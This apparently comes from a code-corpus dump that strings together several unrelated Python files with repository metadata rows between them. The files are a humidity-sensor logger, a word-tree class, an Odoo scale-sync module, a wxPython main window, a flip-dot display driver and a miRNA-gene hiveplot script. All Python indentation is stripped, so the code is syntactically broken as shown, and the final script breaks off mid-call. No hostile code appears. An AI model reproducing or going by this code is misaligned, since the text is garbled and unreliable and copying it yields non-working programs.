return Pws(T) * RH / 100
#Calculate Absolute Humidity
def AbsHum(T,RH):
return c7 * Pw(T,RH) / (273.15 + T)
def InitLogger():
global logger
logger = logging.getLogger('Temp')
hdlr = logging.FileHandler(log)
hdlr.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
if __name__ == "__main__":
global logger
InitLogger()
con = sql.connect(db)
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
logger.warning('\n'+ts+' - Sensor Startup')
while True:
relhum, temperature = Adafruit_DHT.read_retry(sensor,pin)
abshum = AbsHum(temperature, relhum)
#convert temp from C to F:
temperature = temperature * 9 / 5 + 32
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
output = ts + ' - Temp={0:0.1f}*F Relative Humidity={1:0.1f}% Absolute Humidity={2:0.1f}'.format(temperature, relhum, abshum)
logger.warning(output)
print output
sqlinsert = "INSERT INTO data(temp, relhum, abshum, stamp) VALUES("+"{0:.2f}".format(temperature)+","+"{0:.2f}".format(relhum)+","+"{0:.2f}".format(abshum)+",CURRENT_TIMESTAMP)"
with con:
cur = con.cursor()
cur.execute(sqlinsert)
#TODO - add averager instead of sleep?
time.sleep(60)
| gpl-2.0 | 1,882,497,555,781,134,600 | 28.290698 | 178 | 0.681223 | false | 2.70279 | false | false | false |
jlettvin/Unicode | py2/Tree.py | 1 | 5174 | #!/usr/bin/env python
# -*- coding: utf8 -*-
"""
This module creates word trees, splices, prunes, and queries.
"""
__module__ = "Tree.py"
__author__ = "Jonathan D. Lettvin"
__copyright__ = "\
Copyright(C) 2016 Jonathan D. Lettvin, All Rights Reserved"
__credits__ = ["Jonathan D. Lettvin"]
__license__ = "GPLv3"
__version__ = "0.0.3"
__maintainer__ = "Jonathan D. Lettvin"
__email__ = "[email protected]"
__contact__ = "[email protected]"
__status__ = "Demonstration"
__date__ = "20161102"
from CPT import CPT
# CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
class Tree(set):
"""
Tree instances as unitree, a tree for fast specified word lookup.
unitree(word) functor adds word to tree.
unitree[word] getitem returns True if word is in tree.
unitree(word, "delete") remove word from tree
unitree.delete(word) remove word from tree
unitree.word(word, variant) add variant targeting word to tree
A word or list of words may be given while instancing.
A word or list of words may be added after instancing by functor.
For canonicalization of word variants, the terminal is a set such that
common tree variations for dissimilar words can have multiple results.
TODO; when deleting word, delete its variations (remove from word lists).
"""
def __init__(self, **kw):
self.kw = kw
self.wordlist = kw.get('wordlist', [])
self.case = kw.get('ignorecase', False)
self.end = kw.get('end', 0xFFFF) # non-codepoint usable as end key.
self.tree = {} # CPT() # {}
self(self.wordlist)
def word(self, root, also=None):
"For a word, insert it into tree or retrieve it from tree"
if isinstance(also, list):
for variation in also:
self.word(root, variation)
return self
fork = self.tree
if not also:
also = root
for o in (ord(c) for c in also): # iteration costs less than recursion
fork[o] = fork.get(o, {})
fork = fork[o]
if not fork.get(self.end):
fork[self.end] = set([root])
else:
fork[self.end].add(root)
self.add(root)
return self
def __call__(self, word, *args):
"word or delete a word or list of words to the tree"
if isinstance(word, list):
map(self, word)
else:
if "delete" in args:
self.delete(word)
else:
self.word(word)
self.add(word)
# TODO: internal variations mechanism doesn't work yet.
# for variant in Tree.variations(word):
# self.word(word, variant)
return self
def delete(self, root, tree=False, level=0, N=0):
"Prune a word or list of words from the tree"
# TODO delete variations as well as root
if tree is False:
tree = self.tree
N = len(root)
level = 0
if N <= level:
self.discard(root)
unique = (tree and (len(tree) == 1))
terminal = tree and self.end in tree
if terminal:
tree[self.end].discard(root)
return unique and terminal
C = root[level]
O = ord(C)
if O in tree:
if self.delete(root, tree[O], level + 1, N) and len(tree) == 1:
del tree[O]
return True
return False
def _graphviz(self, tree, token=u""):
text = u""
for k, w in tree.iteritems():
if k == self.end:
terminal = u','.join(w)
text += u'"%s" -> "[%s]" [label="$"];\n' % (token, terminal)
text += u'"[%s]" -> "STOP";\n' % (terminal)
else:
newtoken = token + unichr(k)
text += u'"%s";\n' % (newtoken)
if token is not u"":
label = u'[label="' + unichr(k) + u'"];'
text += u'"%s" -> "%s" %s\n' % (token, newtoken, label)
text += self._graphviz(w, newtoken)
if tree == self.tree:
fmt = '"START" -> "%s" [label="%s"];\n'
text += fmt % (newtoken, unichr(k))
return text
def graphviz(self, dotname="Tree.dot"):
"Produce .dot file for use by graphviz external program"
head = 'digraph tree {\n rankdir=LR;\n concentrate=true;\n'
tail = "}"
with open(dotname, "w+b") as dotstream:
try:
print>>dotstream, head + self._graphviz(self.tree) + tail
except Exception as why: # pylint: disable=broad-except
print("Can't output: %s(%s)" % (dotname, str(why)))
finally:
pass
def __getitem__(self, find):
"Find in the tree"
fork = self.tree
for o in (ord(c) for c in find):
fork = fork.get(o, {})
if fork == {}:
break
return fork.get(self.end, False)
| gpl-3.0 | 122,155,553,994,677,650 | 33.724832 | 79 | 0.52242 | false | 3.733045 | false | false | false |
houssine78/addons | product_to_scale_bizerba_extended/models/product.py | 1 | 5761 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 GRAP (http://www.grap.coop)
# Copyright © 2017 Coop IT Easy (http://www.coopiteasy.be)
# @author: Sylvain LE GAL (https://twitter.com/legalsylvain)
# @author: Houssine BAKKALI (https://github.com/houssine78)
# @author: Rémy TAYMANS <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from datetime import datetime
from openerp import api, fields, models, _
import openerp.addons.decimal_precision as dp
# TODO: scale_category is defined in beesdoo_product but this module do
# not depend on it. Find a way to configure these fields.
ADDITIONAL_FIELDS = ['list_price', 'scale_category', 'image_medium']
class ProductTemplate(models.Model):
_inherit = 'product.template'
scale_group_id = fields.Many2one(
related="product_variant_ids.scale_group_id",
string='Scale Group',
store=True
)
scale_sequence = fields.Integer(
related="product_variant_ids.scale_sequence",
string='Scale Sequence',
store=True
)
scale_tare_weight = fields.Float(
related="product_variant_ids.scale_tare_weight",
string='Scale Tare Weight',
store=True,
help="Set here Constant tare weight"
" for the given product. This tare will be substracted when"
" the product is weighted. Usefull only for weightable product.\n"
"The tare is defined with kg uom."
)
# View Section
@api.multi
def send_scale_create(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('create', True)
return True
@api.multi
def send_scale_write(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('write', True)
return True
@api.multi
def send_scale_unlink(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('unlink')
return True
# Custom Section
def _send_to_scale_bizerba(self, action, send_product_image=False):
log_obj = self.env['product.scale.log']
log_obj.create({
'log_date': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'scale_system_id': self.scale_group_id.scale_system_id.id,
'product_id': self.id,
'action': action,
'send_product_image': send_product_image,
})
def _check_vals_scale_bizerba(self, vals):
system = self.scale_group_id.scale_system_id
system_fields = [x.name for x in system.field_ids]
for product_field in ADDITIONAL_FIELDS:
if product_field not in system_fields:
system_fields.append(product_field)
vals_fields = vals.keys()
return set(system_fields).intersection(vals_fields)
def is_in_scale(self):
"""Return True if the current product should be in the scale
system.
"""
self.ensure_one()
return self.active and self.sale_ok and self.scale_group_id
def is_new_in_scale(self, vals):
"""Return True if the current product will be new in the scale
system after the write.
"""
return not self.is_in_scale() and self.will_be_in_scale(vals)
def will_be_in_scale(self, vals):
"""Return True if the current product will be in the scale
system after the write.
"""
self.ensure_one()
return (vals.get('active', self.active)
and vals.get('sale_ok', self.sale_ok)
and vals.get('scale_group_id', self.scale_group_id))
# Overload Section
@api.model
def create(self, vals):
product = super(ProductTemplate, self).create(vals)
if product.is_in_scale():
product._send_to_scale_bizerba('create')
return product
@api.multi
def write(self, vals):
defered = {}
for product in self:
if product.is_new_in_scale(vals):
# Product is new to the scale system: create it.
defered[product.id] = 'create'
elif product.is_in_scale() and product.will_be_in_scale(vals):
# Product is in the scale system and will be in the
# scale system after the write: if there is changes in
# the fields related to the scale system, update it.
if product._check_vals_scale_bizerba(vals):
defered[product.id] = 'write'
# If scale_group has change, product must be updated.
if ('scale_group_id' in vals
and vals['scale_group_id'] != product.scale_group_id):
# Remove it from previous group
product._send_to_scale_bizerba('unlink')
# Send it in the new group
defered[product.id] = 'create'
elif product.is_in_scale() and not product.will_be_in_scale(vals):
# Product is in the scale system and will no longer be
# in the scale system after the write: delete it.
defered[product.id] = 'unlink'
res = super(ProductTemplate, self).write(vals)
for product_id, action in defered.iteritems():
product = self.browse(product_id)
product._send_to_scale_bizerba(action, True)
return res
@api.multi
def unlink(self):
for product in self:
if product.is_in_scale():
self._send_to_scale_bizerba('unlink')
return super(ProductTemplate, self).unlink()
| agpl-3.0 | -1,830,335,323,021,932,800 | 37.393333 | 78 | 0.598368 | false | 3.816435 | false | false | false |
manuelcortez/socializer | src/wxUI/mainWindow.py | 1 | 6599 | # -*- coding: utf-8 -*-
import wx
import wx.adv
import application
from pubsub import pub
class mainWindow(wx.Frame):
def makeMenu(self):
mb = wx.MenuBar()
app_ = wx.Menu()
create = wx.Menu()
self.audio_album = create.Append(wx.NewId(), _("Audio album"))
self.video_album = create.Append(wx.NewId(), _("Video album"))
app_.Append(wx.NewId(), _("Create"), create)
delete = wx.Menu()
self.delete_audio_album = delete.Append(wx.NewId(), _("Audio album"))
self.delete_video_album = delete.Append(wx.NewId(), _("Video album"))
app_.Append(wx.NewId(), _("Delete"), delete)
self.blacklist = app_.Append(wx.NewId(), _("Blacklist"))
self.accounts = app_.Append(wx.NewId(), _("Manage accounts"))
self.settings_dialog = app_.Append(wx.NewId(), _("Preferences"))
me = wx.Menu()
profile = wx.Menu()
self.view_profile = profile.Append(wx.NewId(), _("View profile"))
# self.edit_profile = profile.Append(wx.NewId(), _("Edit profile"))
self.open_in_browser = profile.Append(wx.NewId(), _("Open in browser"))
me.Append(wx.NewId(), _("Profile"), profile)
self.set_status = me.Append(wx.NewId(), _("Set status message"))
buffer = wx.Menu()
search = wx.Menu()
self.search_audios = search.Append(wx.NewId(), _("Audio"))
self.search_videos = search.Append(wx.NewId(), _("Video"))
self.timeline = buffer.Append(wx.NewId(), _("&New timeline"))
buffer.Append(wx.NewId(), _("Search"), search)
self.update_buffer = buffer.Append(wx.NewId(), _("Update current buffer"))
self.load_previous_items = buffer.Append(wx.NewId(), _("Load previous items"))
self.remove_buffer_ = buffer.Append(wx.NewId(), _("&Remove buffer"))
mb.Append(app_, _("Application"))
mb.Append(me, _("Me"))
mb.Append(buffer, _("Buffer"))
player = wx.Menu()
self.player_play = player.Append(wx.NewId(), _("Play/Pause"))
self.player_play_all = player.Append(wx.NewId(), _("Play all"))
self.player_previous = player.Append(wx.NewId(), _("Previous"))
self.player_next = player.Append(wx.NewId(), _("Next"))
self.player_shuffle = player.AppendCheckItem(wx.NewId(), _("Shuffle"))
self.player_seek_left = player.Append(wx.NewId(), _("Seek backwards"))
self.player_seek_right = player.Append(wx.NewId(), _("Seek forwards"))
self.player_volume_up = player.Append(wx.NewId(), _("Volume up"))
self.player_volume_down = player.Append(wx.NewId(), _("Volume down"))
self.player_mute = player.Append(wx.NewId(), _("Mute"))
help_ = wx.Menu()
self.about = help_.Append(wx.NewId(), _("About {0}").format(application.name,))
self.documentation = help_.Append(wx.NewId(), _("Manual"))
self.check_for_updates = help_.Append(wx.NewId(), _("Check for updates"))
self.changelog = help_.Append(wx.NewId(), _("Chan&gelog"))
self.open_logs = help_.Append(wx.NewId(), _("Open logs directory"))
self.open_config = help_.Append(wx.NewId(), _("Open config directory"))
self.report = help_.Append(wx.NewId(), _("Report an error"))
mb.Append(player, _("Audio player"))
mb.Append(help_, _("Help"))
self.SetMenuBar(mb)
self.accel_tbl = wx.AcceleratorTable([
# Assign keystrokes to control the player object.
(wx.ACCEL_ALT, wx.WXK_LEFT, self.player_previous.GetId()),
(wx.ACCEL_ALT, wx.WXK_RIGHT, self.player_next.GetId()),
(wx.ACCEL_ALT, wx.WXK_DOWN, self.player_volume_down.GetId()),
(wx.ACCEL_ALT, wx.WXK_UP, self.player_volume_up.GetId()),
# Translators: Keystroke used to play/pause the current item in the playback queue. Use the latin alphabet, but you can match a different key here. For example if you want to assign this to the key "П", use G.
(wx.ACCEL_CTRL, ord(_("P")), self.player_play.GetId()),
(wx.ACCEL_CTRL|wx.ACCEL_SHIFT, ord(_("P")), self.player_play_all.GetId()),
(wx.ACCEL_ALT|wx.ACCEL_SHIFT, wx.WXK_LEFT, self.player_seek_left.GetId()),
(wx.ACCEL_ALT|wx.ACCEL_SHIFT, wx.WXK_RIGHT, self.player_seek_right.GetId()),
])
self.SetAcceleratorTable(self.accel_tbl)
def __init__(self):
super(mainWindow, self).__init__(parent=None, id=wx.NewId(), title=application.name)
self.Maximize()
self.makeMenu()
self.panel = wx.Panel(self)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sb = self.CreateStatusBar()
self.tb = wx.Treebook(self.panel, -1)
self.sizer.Add(self.tb, 1, wx.ALL|wx.EXPAND, 5)
pub.subscribe(self.change_status, "change_status")
def realize(self):
self.panel.SetSizer(self.sizer)
self.SetClientSize(self.sizer.CalcMin())
self.Layout()
self.SetSize(self.GetBestSize())
def change_status(self, status):
wx.CallAfter(self.sb.SetStatusText, status)
def connection_error(self):
wx.MessageDialog(self, _("There is a connection error. Check your internet connection and try again later."), _("Connection error"), wx.ICON_ERROR).ShowModal()
def get_buffer_count(self):
return self.tb.GetPageCount()
def add_buffer(self, buffer, name):
self.tb.AddPage(buffer, name)
def insert_buffer(self, buffer, name, pos):
return self.tb.InsertSubPage(pos, buffer, name)
def insert_chat_buffer(self, buffer, name, pos):
return self.tb.InsertPage(pos, buffer, name)
def search(self, name_):
for i in range(0, self.tb.GetPageCount()):
if self.tb.GetPage(i).name == name_: return i
def get_current_buffer(self):
return self.tb.GetCurrentPage()
def get_current_buffer_pos(self):
return self.tb.GetSelection()
def get_buffer(self, pos):
return self.GetPage(pos)
def change_buffer(self, position):
self.tb.ChangeSelection(position)
def get_buffer_text(self, pos=None):
if pos == None:
pos = self.tb.GetSelection()
return self.tb.GetPageText(pos)
def get_buffer_by_id(self, id):
return self.nb.FindWindowById(id)
def advance_selection(self, forward):
self.tb.AdvanceSelection(forward)
def about_dialog(self, channel="stable", *args, **kwargs):
if channel == "stable":
version = _("{version} (stable)").format(version=application.version)
else:
version = _("{version} (alpha)").format(version=application.update_next_version)
info = wx.adv.AboutDialogInfo()
info.SetName(application.name)
info.SetVersion(version)
info.SetDescription(application.description)
info.SetCopyright(application.copyright)
info.SetTranslators(application.translators)
# info.SetLicence(application.licence)
info.AddDeveloper(application.author)
wx.adv.AboutBox(info)
def remove_buffer(self, pos):
self.tb.DeletePage(pos)
def remove_buffer_from_position(self, pos):
return self.tb.RemovePage(pos)
def notify(self, title, text):
self.notification = wx.adv.NotificationMessage(title=title, message=text, parent=self)
self.notification.Show() | gpl-2.0 | -7,536,460,924,683,224,000 | 39.484663 | 212 | 0.68839 | false | 2.993648 | false | false | false |
Kiganshee/Flip-Sign | DisplayClasses.py | 1 | 18270 | from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from TransitionFunctions import *
import copy
import struct
import serial
from MessageClasses import *
class Display(object):
"""
This class represents a display -- it has properties that specify its width and number of lines.
It also has a property that represents its current state (e.g. what it is currently displaying).
It has an update method which is fed a display object, a transition function and a delay.
The transition function takes in a current display state and a desired display state, then returns
a list of intermediate display states that need to be transitioned through.
A display state is stored as a list of length num_lines that contains only strings of length num_chars.
"""
def __init__(self, num_lines, num_chars):
self.num_lines = num_lines
self.num_chars = num_chars
self.currentstate = [' '*num_chars]*num_lines
def determine_transition(self, transitionfunction, messageobject):
messageobject.update(num_lines=self.num_lines, num_chars=self.num_chars)
return transitionfunction(self.currentstate, messageobject.get_message())
def update(self, transitionfunction, messageobject):
# this will be different for each display type, so must be overridden
raise NotImplementedError
class SimpleDisplay(Display):
"""
This class is the simplest display possible - it just prints the info to the console.
"""
def __init__self(self, num_lines, num_chars):
Display.__init__(self, num_lines, num_chars)
def update(self, transitionfunction, messageobject):
states = self.determine_transition(transitionfunction, messageobject)
for i in range(len(states)):
print(states[i])
class SerialLCDDisplay(Display):
"""
This class is an LCD display controlled via serial -- it takes in a bytestring of length num_chars * num_lines and
displays it.
"""
def __init__(self, num_lines, num_chars, device, frequency, reactiontime):
"""
:param num_lines: number of lines in the display
:param num_chars: number of characters in each line of the display
:param device: device location of the serial connection (e.g. '/dev/tty.usbserial')
:param frequency: baud rate of the connection (e.g. 9600)
:param reactiontime: delay between each update action, seconds
"""
Display.__init__(self, num_lines, num_chars)
self.device = device
self.frequency = frequency
self.reactiontime = reactiontime
def update(self, transitionfunction, messageobject):
import serial
import time
ser = serial.Serial(self.device, self.frequency)
time.sleep(self.reactiontime)
states = self.determine_transition(transitionfunction, messageobject)
print("Attempting to display ", messageobject)
for i in range(len(states)):
output = ""
for z in range(self.num_lines):
output += states[i][z]
ser.write(output.encode(encoding='us-ascii', errors='strict'))
time.sleep(self.reactiontime)
ser.close()
class FlipDotDisplay(Display):
"""
This class represents a rectangular array of flip dot displays from AlfaZeta, arranged in an arbitrary layout.
"""
def __init__(self, rows, columns, serialinterface, layout):
"""
Initializes the display.
:param rows: Integer number of rows in the display
:param columns: Integer number of columns in the display
:param layout: A dictionary, with keys being (row,column) tuples. layout[(row,column)]
should return a tuple (displayID,bytenum,powerof2)
:param serialinterface: A python serial module object, representing the serial interface of the actual display
"""
# Make sure variables are of the right type. For layout, only make sure it has the right dimensions
assert type(rows) == int
assert type(columns) == int
assert isinstance(serialinterface, serial.Serial)
self.rows = rows
self.columns = columns
self.layout = copy.deepcopy(layout)
self.serial = serialinterface
self.invert = False
# determine indices of displays and number of bytes
# display is a dictionary of the displays, indexed by their identifier
# each element of the dictionary is an integer (number of bytes)
# this loop determines the largest bytenum for each display
display = {}
for pixel in layout:
if layout[pixel][0] in display:
if layout[pixel][1] > display[layout[pixel][0]]:
display[layout[pixel][0]] = layout[pixel][1]
else:
display[layout[pixel][0]] = layout[pixel][1]
# turn the display dictionary into a dictionary of lists, each list the length of the bytes in the display
# default empty state is 0 (all pixels in column black)
for disp in display:
temp = display[disp]
display[disp] = [0]*(temp + 1)
self.emptystate = copy.deepcopy(display)
# initialize current state to all black and then set the display to it
self.currentstate = Image.new('1', (self.columns, self.rows), 0)
self.show(self.currentstate)
self.currentmessage = None
def flip_invert(self):
"""
Swaps display from inverted to not inverted or vice versa
:return:
"""
self.invert = not self.invert
def get_invert(self):
"""
Safe way to determine whether the display is inverted
:return: boolean, indicating whether colors are inverted or not
"""
return self.invert
def show(self, desiredstate):
"""
Writes the desired state to the display.
:param desiredstate: a PIL image object, of dimensions (rows,columns)
:return: None
"""
# to optimize time, only going to check if the first row has the proper number of columns
assert (self.columns, self.rows) == desiredstate.size
# turn desiredstate into a list of lists, with desiredstate[row][column] returning the pixel direction
pixel = list(desiredstate.getdata())
pixels = [pixel[i * self.columns: (i + 1) * self.columns] for i in range(self.rows)]
# start with generic command strings
head = b'\x80'
tail = b'\x8F'
cmd = b'\x84'
refresh = head + b'\x82' + tail
cmdstring = b''
display = copy.deepcopy(self.emptystate)
# first need to use self.layout to turn the pixels array into the display IDs and byte values
# iterate through all the rows and columns in the desired state
for row in range(len(pixels)):
for column in range(len(pixels[row])):
# sometimes white will be 255, sometimes it will be 1
# this code needs white to be 1 for calculation purposes
# sanitize 255 into 1, or just use as is
if pixels[row][column] == 255:
pixel = 1
else:
pixel = pixels[row][column]
# if display is inverted, turn 1 into 0 and vice versa, otherwise leave as is
if self.invert:
pixel = 1 - pixel
# display[displaynum from layout] [ bytenum from layout] incremented by the pixels value * power
# of 2 from layout
display[self.layout[(row, column)][0]][self.layout[(row, column)][1]] +=\
pixel * 2 ** self.layout[(row, column)][2]
# iterate through the displays and turn them into the proper byte arrays
for disp in display:
# start off each command with a head and command string
# add the display address
# to generate bytes for the address, use struct.pack('=b',ADDRESS)
# add the actual command string- use the bytearray function to turn the list of integers into the byte array
cmdstring += head + cmd + struct.pack('=b', disp) + bytearray(display[disp]) + tail
# once done, add the refresh command to the end of the command string
cmdstring += refresh
# write the command to the serial interface
self.serial.write(cmdstring)
def update(self, transitionfunction, displayobject,font):
# Ensure proper types
assert isinstance(displayobject, Message) or isinstance(displayobject, Image.Image)
if isinstance(displayobject, Message):
assert isinstance(font, ImageFont.FreeTypeFont)
assert callable(transitionfunction)
assert transitionfunction.is_message_transition or transitionfunction.is_display_transition
displaystates = []
# if an image
if isinstance(displayobject, Image.Image):
# either crop it to fit the display (keep top left) or pad to fill (center)
# first check if either of the dimensions are too big
image_for_transition = displayobject
if displayobject.size[0] > self.columns or displayobject.size[1] > self.rows:
horizontalcrop = max(displayobject.size[0] - self.columns, 0)
verticalcrop = max(displayobject.size[1] - self.rows, 0)
image_for_transition = displayobject.crop((0 + horizontalcrop // 2, 0 + verticalcrop // 2,
displayobject.size[0] - horizontalcrop // 2 - horizontalcrop % 2,
displayobject.size[1] - verticalcrop // 2 - verticalcrop % 2))
# now that any cropping has been done, need to check if the image needs to be padded
if image_for_transition.size[0] < self.columns or displayobject.size[1] < self.rows:
image_for_transition = pad_image(displayobject, self.rows, self.columns, fill=0)
# if a message, we need to figure some things
elif isinstance(displayobject, Message):
# check the size of the phrase "ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz " to see how wide
# and tall the display is in terms of characters with the specified font
checkwidth, checkheight = font.getsize("ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz ")
checkwidth //= 54
display_width_chars = self.columns // checkwidth
display_height_chars = self.rows // checkheight
if display_height_chars < 1 or display_width_chars < 1:
raise ValueError("My font is too big! My font is TOO BIG!")
# set foundissue to true to ensure we check at least once
foundissue = True
# purpose of this loop is to check ensure we get a message that fits in the display
# the initial estimate of the number of characters is a guess - because some fonts do not have the same
# width for each character, the actual size taken up can depend on the message
# so, we check if the message fits. if it doesn't, we honor the font size provided and reduce the amount
# of space available for the message
while foundissue:
# tell the message to update with the estimated number of characters
displayobject.update(num_lines=display_height_chars, num_chars=display_width_chars)
totalheight = 0
maxwidth = 0
foundissue = False
# determine max dimensions of the image
for line in displayobject.get_message():
width, height = font.getsize(line)
totalheight += height
maxwidth = max(maxwidth, width)
# check against maximum display dimensions and update the "message size" if necessary
if maxwidth > self.columns:
foundissue = True
display_width_chars = int(display_width_chars * self.columns / maxwidth)
if totalheight > self.rows:
foundissue = True
display_height_chars = int(display_height_chars * self.rows / totalheight)
# at the end of the loop, totalheight and maxwidth should contain the actual values for the message
# if the provided transition function is messagetransition, apply it here to generate a message states list
# then turn those message states into display states
# otherwise, create a single-item list that is just the eventual message
if transitionfunction.is_message_transition:
# try to use transition function - if we get an assertion error, that means the current display state
# is an image, so a message transition is not possible
try:
messagestates = transitionfunction(self.currentmessage, displayobject.get_message())
except AssertionError:
messagestates = [displayobject.get_message()]
# since our function is a message function, we create the displaystates list here
for messagestate in messagestates:
image = message_to_image(messagestate, self.columns, self.rows, maxwidth, totalheight,
font, display_height_chars)
displaystates.append(image)
# since our function is not a message function, we just make the message into an image for transition
else:
image_for_transition = message_to_image(displayobject.get_message(), self.columns, self.rows, maxwidth,
totalheight, font, display_height_chars)
# write the message output to the self.currentmessage container, so future message transitions can work
self.currentmessage = displayobject.get_message()
else: # it's not a message or an image - technically this should not be possible because of the asserts
raise AssertionError("Assertion not working")
# if the provided transition function is a displaytransition, then use the transition function to generate
# desired display states
if transitionfunction.is_display_transition:
displaystates = transitionfunction(self.currentstate, image_for_transition)
# if we get this far and displaystates is still an empty list, then
# we got an image to display, but combined with a message transition. just use simpletransition
if displaystates == []:
displaystates = SimpleTransition(self.currentstate, image_for_transition)
# show the desired states on the display
for state in displaystates:
self.show(state)
self.currentstate = displaystates[-1]
class FakeFlipDotDisplay(FlipDotDisplay):
def __init__(self, rows, columns, serialinterface, layout):
self.file_number = 1
FlipDotDisplay.__init__(self, rows, columns, serialinterface, layout)
def show(self, desiredstate):
desiredstate.format = 'PNG'
statepath = '/Users/cmcd/PycharmProjects/SignStorage/'
desiredstate.save(statepath + str(self.file_number) + '.PNG', format='PNG')
self.file_number += 1
def pad_image(Image, rows, columns, fill=0):
"""
Takes in an image file, returns a padded image to fit the rectangle given by the rows and columns dimensions
:param Image: A PIL image object
:param rows: integer, number of rows of pixels
:param columns: integer, number of columns of pixels
:param fill: an integer 1 or 0, indicating which color to fill the padded area with (1= white, 0 = black)
:return: A PIL image object of dimensions (rows,columns) with the provided image in the center
"""
# create new image of the desired size, with the fill
padded = Image.new('1', (columns, rows), fill)
incolumns, inrows = Image.size
if incolumns > columns or inrows > rows:
raise ValueError("Input image must be less than or equal to the output size in all dimensions.")
# paste provided image into created image, such that it is as centered as possible in the new area
padded.paste(Image, ((columns - incolumns) // 2, (rows-inrows) // 2))
return padded
def initialize_row_spacing_lookup():
"""
Could not determine an algorithm for how to space the lines, so going to use a lookup table.
lookuptable[num_lines][extra_spaces] will contain a tuple (top,per_line) which indicates how many spaces go
at the top and how many go between each line.
:return: a lookup table, which is a list of lists of tuples.
"""
output = [[(None, None)]*12 for i in range(12)]
output[3][0] = (0, 0)
output[3][1] = (0, 0)
output[3][2] = (0, 1)
output[3][3] = (0, 1)
output[3][4] = (1, 1)
output[3][5] = (1, 1)
output[2][0] = (0, 0)
output[2][1] = (0, 1)
output[2][2] = (0, 1)
output[2][3] = (1, 1)
output[2][4] = (1, 2)
output[2][5] = (1, 2)
return output
def message_to_image(message, columns, rows, max_width, total_height, font, display_height_chars):
image = Image.new('1', (columns, rows), 0)
# calculate x position to write the lines to - this is easy since it's just centering the stuff
xposition = (columns - max_width) // 2
# calculate y position and spacing - more difficult since there are multiple lines and spacing between
total_y_space = rows - total_height
yposition, per_line = initialize_row_spacing_lookup()[display_height_chars][total_y_space]
if yposition is None:
yposition = total_y_space // 2 + 1
per_line = 0
line_height = font.getsize('A')[1]
# iterate through the lines in the message, writing each line at the right position and then
# incrementing the position
for i in range(len(message)):
ImageDraw.Draw(image).text((xposition, yposition), message[i], fill=1, font=font)
yposition += line_height + per_line
return image
| cc0-1.0 | 6,451,781,360,778,824,000 | 47.850267 | 120 | 0.638588 | false | 4.446337 | false | false | false |
CSB-IG/miRNAseq_rnw | source_scripts_data/hiveplot/hiveplot_mirna_genes.py | 2 | 4447 | from pyveplot import *
import networkx as nx
import csv
import argparse
import math
import progressbar
def coords( radius, angle, origin=(0,0)):
""" Returns a tuple of tuples of coordinates given a radius, angle and origin tuple """
return (origin[0] + round((radius * math.cos(math.radians(angle))), 2),
origin[1] + round((radius * math.sin(math.radians(angle))), 2))
from pprint import pprint
parser = argparse.ArgumentParser(description='hiveplot of mirna-gene interactions')
parser.add_argument('edgelist', type=argparse.FileType('r'), help="network in edgelist format")
parser.add_argument('plot', type=argparse.FileType('w'), help="plot file")
args = parser.parse_args()
# load edges into graph
g = nx.Graph()
for edge in csv.DictReader(args.edgelist, delimiter="\t"):
g.add_edge( edge['from'], edge['to'], w=float(edge['weight']) )
# sort nodes by degree
by_degree = {}
for n in g.nodes():
d = g.degree(n)
if d in by_degree:
by_degree[d].append(n)
else:
by_degree[d] = [n, ]
degree_ordered = []
for d in sorted(by_degree.keys(), reverse=False):
degree_ordered += by_degree[d]
# if a gene doesn't have other genes as its first neighbors
def only_talks_to_mrna( gene ):
status = True
for n in g.neighbors(gene):
if not n.startswith('hsa'):
return False
return status
mirna_genes = []
genes = []
mirnas = []
# classify nodes
for n in degree_ordered:
if not n.startswith('hsa'):
genes.append(n)
if only_talks_to_mrna(n):
mirna_genes.append(n)
else:
mirnas.append(n)
h = Hiveplot( args.plot.name )
args.plot.close()
h.dwg.width=15000
h.dwg.height=15000
#centre = (len(mirnas)+30, len(mirnas)+30)
centre = (516*2, 516*2)
print "centre", centre
# configure mirna axes
m1 = Axis( coords(20, -90, centre), coords(len(mirnas)*2, -90, centre), stroke="#CBFF65", stroke_width=10)
m2 = Axis( coords(20, -180, centre), coords(len(mirnas)*2, -180, centre), stroke="#CBFF65", stroke_width=10)
pos = 0.0
delta = 1.0 / len(mirnas)
for n in mirnas:
node0 = Node(n)
node1 = Node(n)
m1.add_node( node0, pos )
m2.add_node( node1, pos )
pos += delta
g1 = Axis(coords(20, 0, centre), coords(len(genes)*0.5, 0, centre), stroke="#00C598", stroke_width=10)
g2 = Axis(coords(20, 90, centre), coords(len(genes)*0.5, 90, centre), stroke="#00C598", stroke_width=10)
pos = 0.0
delta = 1.0 / len(genes)
for n in genes:
node0 = Node(n)
node1 = Node(n)
g1.add_node( node0, pos )
g2.add_node( node1, pos )
pos += delta
h.axes = [m1, m2, g1, g2]
bar = progressbar.ProgressBar()
for e in bar(g.edges()):
if e[0] in mirnas and e[1] in mirnas: # mirnas to mirnas
h.connect(m2, e[0], 23,
m1, e[1], -23,
stroke_width = g.get_edge_data(*e)['w'] * 10,
stroke_opacity = 0.035,
stroke = 'grey')
if e[0] in mirnas and e[1] in genes and e[1] not in mirna_genes: # mirnas to genes
h.connect(m1, e[0], 23,
g1, e[1], -23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[1] in mirnas and e[0] in genes and e[0] not in mirna_genes: # mirnas to genes
h.connect(m1, e[1], 23,
g1, e[0], -23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[0] in genes and e[1] in genes: # genes to genes
h.connect(g1, e[0], 23,
g2, e[1], -23,
